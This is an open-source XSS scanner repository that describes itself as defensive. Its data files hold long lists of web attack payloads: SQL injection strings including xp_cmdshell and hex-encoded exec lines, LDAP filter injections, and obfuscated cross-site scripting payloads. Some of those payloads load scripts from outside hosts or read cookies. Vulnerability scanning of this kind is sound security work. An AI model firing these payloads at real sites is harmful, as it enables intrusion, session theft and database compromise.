├── .gitignore
├── .travis.yml
├── LICENSE
├── README.md
├── data
    ├── payload.sql.txt
    ├── payload.test.txt
    └── payload.txt
├── package.json
├── src
    ├── config.js
    ├── payload.js
    └── util.js
└── tests
    └── util.test.js


/.gitignore:
--------------------------------------------------------------------------------
 1 | # Logs
 2 | logs
 3 | *.log
 4 | npm-debug.log*
 5 | 
 6 | # Runtime data
 7 | pids
 8 | *.pid
 9 | *.seed
10 | 
11 | # Directory for instrumented libs generated by jscoverage/JSCover
12 | lib-cov
13 | 
14 | # Coverage directory used by tools like istanbul
15 | coverage
16 | 
17 | # nyc test coverage
18 | .nyc_output
19 | 
20 | # Grunt intermediate storage (http://gruntjs.com/creating-plugins#storing-task-files)
21 | .grunt
22 | 
23 | # node-waf configuration
24 | .lock-wscript
25 | 
26 | # Compiled binary addons (http://nodejs.org/api/addons.html)
27 | build/Release
28 | 
29 | # Dependency directories
30 | node_modules
31 | jspm_packages
32 | 
33 | # Optional npm cache directory
34 | .npm
35 | 
36 | # Optional REPL history
37 | .node_repl_history
38 | 
39 | # Output
40 | output
41 | 


--------------------------------------------------------------------------------
/.travis.yml:
--------------------------------------------------------------------------------
1 | language: node_js
2 | node_js:
3 |   - "6"


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2017 Kristofer Krause
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # xss-scanner
 2 | Cross-Site Scripting (XSS) scanner.  This tool helps to find possible XSS vulnerabilities.  It's intended use is to help "plug" the vulnerability, *not* exploit.  Be nice.  Make the web better.
 3 | 
 4 | [![Build Status](https://travis-ci.org/dragthor/xss-scanner.svg?branch=master)](https://travis-ci.org/dragthor/xss-scanner) [![npm version](https://badge.fury.io/js/xss-scanner.svg)](https://badge.fury.io/js/xss-scanner)
 5 | 
 6 | The three most important countermeasures to prevent cross-site scripting attacks are to: 
 7 | 
 8 |   * Constrain input. 
 9 |   * Encode output.
10 |   * Filter user input.
11 | 
12 | Url encode output URLs if they are constructed from input.
13 | 
14 | Html encode output if it contains input from the user or from other sources such as databases. 
15 | 
16 | Cross platform - macOS, Linux, and Windows.  It's also working my Raspberry Pi 3 Model B.
17 | 
18 | ## Installation
19 | `npm install`
20 | 
21 | ## Configuration
22 | Open up the `config.js` file and configure the `xssOptions()` return object.
23 | 
24 | ## Run
25 | `npm start`
26 | 
27 | ## Results
28 | The console shows the XSS parameter values that have made it back with a status code 200.  You can also dump the resulting Html to a file.  Unfortunately, you have to manually check these.  I prefer to use the latest version of Firefox with add-ons and extensions disabled.  Other XSS tools, such as Burp Suite, also require some manual checking.
29 | 
30 | At the top of the Html content, look for a `<![CDATA[ \"-alert(123456789))// ]]>`.  It contains the offending XSS injection payload value.
31 | 
32 | ## Additional Resources
33 | 
34 | [OWASP XSS Cheatsheet](https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet)
35 | 
36 | 


--------------------------------------------------------------------------------
/data/payload.sql.txt:
--------------------------------------------------------------------------------
  1 | '
  2 | a' or 1=1--
  3 | "a"" or 1=1--"
  4 |  or a = a
  5 | a' or 'a' = 'a
  6 | 1 or 1=1
  7 | a' waitfor delay '0:0:10'--
  8 | 1 waitfor delay '0:0:10'--
  9 | declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
 10 | declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 
 11 | declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
 12 | declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
 13 | a'
 14 | ?
 15 | ' or 1=1
 16 |  or 1=1 --
 17 | x' AND userid IS NULL; --
 18 | x' AND email IS NULL; --
 19 | anything' OR 'x'='x
 20 | x' AND 1=(SELECT COUNT(*) FROM tabname); --
 21 | x' AND members.email IS NULL; --
 22 | x' OR full_name LIKE '%Bob%
 23 | 23 OR 1=1
 24 | '; exec master..xp_cmdshell 'ping 172.10.1.255'--
 25 | '
 26 | '%20or%20''='
 27 | '%20or%20'x'='x
 28 | %20or%20x=x
 29 | ')%20or%20('x'='x
 30 | 0 or 1=1
 31 | ' or 0=0 --
 32 | " or 0=0 --
 33 | or 0=0 --
 34 | ' or 0=0 #
 35 |  or 0=0 #"
 36 | or 0=0 #
 37 | ' or 1=1--
 38 | " or 1=1--
 39 | ' or '1'='1'--
 40 | ' or 1 --'
 41 | or 1=1--
 42 | or%201=1
 43 | or%201=1 --
 44 | ' or 1=1 or ''='
 45 |  or 1=1 or ""=
 46 | ' or a=a--
 47 |  or a=a
 48 | ') or ('a'='a
 49 | ) or (a=a
 50 | hi or a=a
 51 | hi or 1=1 --"
 52 | hi' or 1=1 --
 53 | hi' or 'a'='a
 54 | hi') or ('a'='a
 55 | "hi"") or (""a""=""a"
 56 | 'hi' or 'x'='x';
 57 | @variable
 58 | ,@variable
 59 | PRINT
 60 | PRINT @@variable
 61 | select
 62 | insert
 63 | as
 64 | or
 65 | procedure
 66 | limit
 67 | order by
 68 | asc
 69 | desc
 70 | delete
 71 | update
 72 | distinct
 73 | having
 74 | truncate
 75 | replace
 76 | like
 77 | handler
 78 | bfilename
 79 | ' or username like '%
 80 | ' or uname like '%
 81 | ' or userid like '%
 82 | ' or uid like '%
 83 | ' or user like '%
 84 | exec xp
 85 | exec sp
 86 | '; exec master..xp_cmdshell
 87 | '; exec xp_regread
 88 | t'exec master..xp_cmdshell 'nslookup www.google.com'--
 89 | --sp_password
 90 | \x27UNION SELECT
 91 | ' UNION SELECT
 92 | ' UNION ALL SELECT
 93 | ' or (EXISTS)
 94 | ' (select top 1
 95 | '||UTL_HTTP.REQUEST
 96 | 1;SELECT%20*
 97 | to_timestamp_tz
 98 | tz_offset
 99 | <>"'%;)(&+
100 | '%20or%201=1
101 | %27%20or%201=1
102 | %20$(sleep%2050)
103 | %20'sleep%2050'
104 | char%4039%41%2b%40SELECT
105 | &apos;%20OR
106 | 'sqlattempt1
107 | (sqlattempt2)
108 | |
109 | %7C
110 | *|
111 | %2A%7C
112 | *(|(mail=*))
113 | %2A%28%7C%28mail%3D%2A%29%29
114 | *(|(objectclass=*))
115 | %2A%28%7C%28objectclass%3D%2A%29%29
116 | (
117 | %28
118 | )
119 | %29
120 | &
121 | %26
122 | !
123 | %21
124 | ' or 1=1 or ''='
125 | ' or ''='
126 | x' or 1=1 or 'x'='y
127 | /
128 | //
129 | //*
130 | */*
131 | a' or 3=3--
132 | "a"" or 3=3--"
133 | ' or 3=3
134 |  or 3=3 --
135 | 


--------------------------------------------------------------------------------
/data/payload.test.txt:
--------------------------------------------------------------------------------
 1 | \"-alert(123456789))//
 2 | <script>alert(123);</script>
 3 | <ScRipT>alert("XSS");</ScRipT>
 4 | <script>alert(123)</script>
 5 | <script>alert("hellox worldss");</script>
 6 | <script>alert(“XSS”)</script> 
 7 | <script>alert(“XSS”);</script>
 8 | <script>alert(‘XSS’)</script>
 9 | “><script>alert(“XSS”)</script>
10 | <script>alert(/XSS”)</script>
11 | <script>alert(/XSS/)</script>
12 | </script><script>alert(1)</script>
13 | 


--------------------------------------------------------------------------------
/data/payload.txt:
--------------------------------------------------------------------------------
  1 | \"-alert(123))//
  2 | <script>alert(123);</script>
  3 | <ScRipT>alert("XSS");</ScRipT>
  4 | <script>alert(123)</script>
  5 | <script>alert("hellox worldss");</script>
  6 | <script>alert(“XSS”)</script> 
  7 | <script>alert(“XSS”);</script>
  8 | <script>alert(‘XSS’)</script>
  9 | “><script>alert(“XSS”)</script>
 10 | <script>alert(/XSS”)</script>
 11 | <script>alert(/XSS/)</script>
 12 | </script><script>alert(1)</script>
 13 | ‘; alert(1);
 14 | ‘)alert(1);//
 15 | <ScRiPt>alert(1)</sCriPt>
 16 | <IMG SRC=jAVasCrIPt:alert(‘XSS’)>
 17 | <IMG SRC=”javascript:alert(‘XSS’);”>
 18 | <IMG SRC=javascript:alert(&quot;XSS&quot;)>
 19 | <IMG SRC=javascript:alert(‘XSS’)>      
 20 | <img src=xss onerror=alert(1)>
 21 | <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
 22 | <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
 23 | <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
 24 | <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
 25 | <img/src=`%00` onerror=this.onerror=confirm(1)
 26 | <form><isindex formaction="javascript&colon;confirm(1)"
 27 | <img src=`%00`&NewLine; onerror=alert(1)&NewLine;
 28 | <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
 29 | <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
 30 | <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
 31 | <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
 32 | &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
 33 | <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
 34 | <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
 35 | <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
 36 | <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
 37 | <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
 38 | <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
 39 | <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
 40 | </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
 41 | <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
 42 | <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
 43 | <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
 44 | http://www.google<script .com>alert(document.location)</script
 45 | <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
 46 | <img/src=@&#32;&#13; onerror = prompt('&#49;')
 47 | <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
 48 | <script ^__^>alert(String.fromCharCode(49))</script ^__^
 49 | </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
 50 | &#00;</form><input type&#61;"date" onfocus="alert(1)">
 51 | <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
 52 | <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
 53 | <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
 54 | <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
 55 | <script ~~~>alert(0%0)</script ~~~>
 56 | <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
 57 | <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
 58 | <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
 59 | &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
 60 | &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
 61 | <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
 62 | <div/style="width:expression(confirm(1))">X</div> {IE7}
 63 | <iframe/%00/ src=javaSCRIPT&colon;alert(1)
 64 | //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
 65 | /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
 66 | //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
 67 | </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
 68 | <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
 69 | </plaintext\></|\><plaintext/onmouseover=prompt(1)
 70 | </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
 71 | <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
 72 | <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
 73 | <iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
 74 | <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
 75 | <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
 76 | <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
 77 | <var onmouseover="prompt(1)">On Mouse Over</var>
 78 | <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
 79 | <img src="/" =_=" title="onerror='prompt(1)'">
 80 | <%<!--'%><script>alert(1);</script -->
 81 | <script src="data:text/javascript,alert(1)"></script>
 82 | <iframe/src \/\/onload = prompt(1)
 83 | <iframe/onreadystatechange=alert(1)
 84 | <svg/onload=alert(1)
 85 | <input value=<><iframe/src=javascript:confirm(1)
 86 | <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
 87 | http://www.<script>alert(1)</script .com
 88 | <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
 89 | <svg><script ?>alert(1)
 90 | <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
 91 | <img src=`xx:xx`onerror=alert(1)>
 92 | <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
 93 | <math><a xlink:href="//jsfiddle.net/t846h/">click
 94 | <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
 95 | <svg contentScriptType=text/vbs><script>MsgBox+1
 96 | <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
 97 | <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
 98 | <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
 99 | <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
100 | <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
101 | <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
102 | <script>+-+-1-+-+alert(1)</script>
103 | <body/onload=&lt;!--&gt;&#10alert(1)>
104 | <script itworksinallbrowsers>/*<script* */alert(1)</script
105 | <img src ?itworksonchrome?\/onerror = alert(1)
106 | <svg><script>//&NewLine;confirm(1);</script </svg>
107 | <svg><script onlypossibleinopera:-)> alert(1)
108 | <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
109 | <script x> alert(1) </script 1=2
110 | <div/onmouseover='alert(1)'> style="x:">
111 | <--`<img/src=` onerror=alert(1)> --!>
112 |  <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
113 | <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
114 | "><img src=x onerror=window.open('https://www.google.com/');>
115 | <form><button formaction=javascript&colon;alert(1)>CLICKME
116 | <math><a xlink:href="//jsfiddle.net/t846h/">click
117 | <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
118 | <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
119 | <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
120 | <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
121 | ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
122 | <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
123 | <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
124 | <IMG SRC=”jav ascript:alert(‘XSS’);”>
125 | <IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>
126 | <<SCRIPT>alert(“XSS”);//<</SCRIPT>
127 | %253cscript%253ealert(1)%253c/script%253e
128 | “><s”%2b”cript>alert(document.cookie)</script>
129 | foo<script>alert(1)</script>
130 | <scr<script>ipt>alert(1)</scr</script>ipt>
131 | <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
132 | <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
133 | <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
134 | <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
135 | <BODY ONLOAD=alert(‘XSS’)>
136 | <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
137 | <IMG SRC=”javascript:alert(‘XSS’)”
138 | <iframe src=http://ha.ckers.org/scriptlet.html <
139 | javascript:alert("hellox worldss")
140 | <img src="javascript:alert('XSS');">
141 | <img src=javascript:alert(&quot;XSS&quot;)>
142 | <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
143 | <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
144 | <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
145 | <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
146 | <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
147 | <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
148 | <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
149 | <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
150 | <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
151 | <<SCRIPT>alert("XSS");//<</SCRIPT>
152 | <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
153 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
154 | <script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
155 | <script>alert("XSS");</script>&search=1
156 | 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
157 | <h1><font color=blue>hellox worldss</h1>
158 | <BODY ONLOAD=alert('hellox worldss')>
159 | <input onfocus=write(XSS) autofocus>
160 | <input onblur=write(XSS) autofocus><input autofocus>
161 | <body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
162 | <form><button formaction="javascript:alert(XSS)">lol
163 | <!--<img src="--><img src=x onerror=alert(XSS)//">
164 | <![><img src="]><img src=x onerror=alert(XSS)//">
165 | <style><img src="</style><img src=x onerror=alert(XSS)//">
166 | <? foo="><script>alert(1)</script>">
167 | <! foo="><script>alert(1)</script>">
168 | </ foo="><script>alert(1)</script>">
169 | <? foo="><x foo='?><script>alert(1)</script>'>">
170 | <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
171 | <% foo><x foo="%><script>alert(123)</script>">
172 | <div style="font-family:'foo&#10;;color:red;';">LOL
173 | LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
174 | <script>({0:#0=alert/#0#/#0#(0)})</script>
175 | <svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
176 | &lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;
177 | \\";alert('XSS');//
178 | &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt;
179 | &lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert('XSS');\"&gt;
180 | &lt;BODY BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
181 | &lt;BODY ONLOAD=alert('XSS')&gt;
182 | &lt;IMG DYNSRC=\"javascript&#058;alert('XSS')\"&gt;
183 | &lt;IMG LOWSRC=\"javascript&#058;alert('XSS')\"&gt;
184 | &lt;BGSOUND SRC=\"javascript&#058;alert('XSS');\"&gt;
185 | &lt;BR SIZE=\"&{alert('XSS')}\"&gt;
186 | &lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/LAYER&gt;
187 | &lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert('XSS');\"&gt;
188 | &lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\"&gt;
189 | &lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt;
190 | &lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\"&gt;
191 | &lt;STYLE&gt;BODY{-moz-binding&#58;url(\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\")}&lt;/STYLE&gt;
192 | &lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt;
193 | &lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
194 | &lt;IMG SRC='vbscript&#058;msgbox(\"XSS\")'&gt;
195 | &lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&gt;
196 | &lt;IMG SRC=\"livescript&#058;&#91;code&#93;\"&gt;
197 | žscriptualert(EXSSE)ž/scriptu
198 | &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert('XSS');\"&gt;
199 | &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt;
200 | &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\"
201 | &lt;IFRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/IFRAME&gt;
202 | &lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/FRAMESET&gt;
203 | &lt;TABLE BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
204 | &lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
205 | &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;
206 | &lt;DIV STYLE=\"background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\"&gt;
207 | &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;
208 | &lt;DIV STYLE=\"width&#58; expression(alert('XSS'));\"&gt;
209 | &lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(\"XSS\")';&lt;/STYLE&gt;
210 | &lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert('XSS'))\"&gt;
211 | &lt;XSS STYLE=\"xss&#58;expression(alert('XSS'))\"&gt;
212 | exp/*&lt;A STYLE='no\xss&#58;noxss(\"*//*\");
213 | xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&gt;
214 | &lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt;
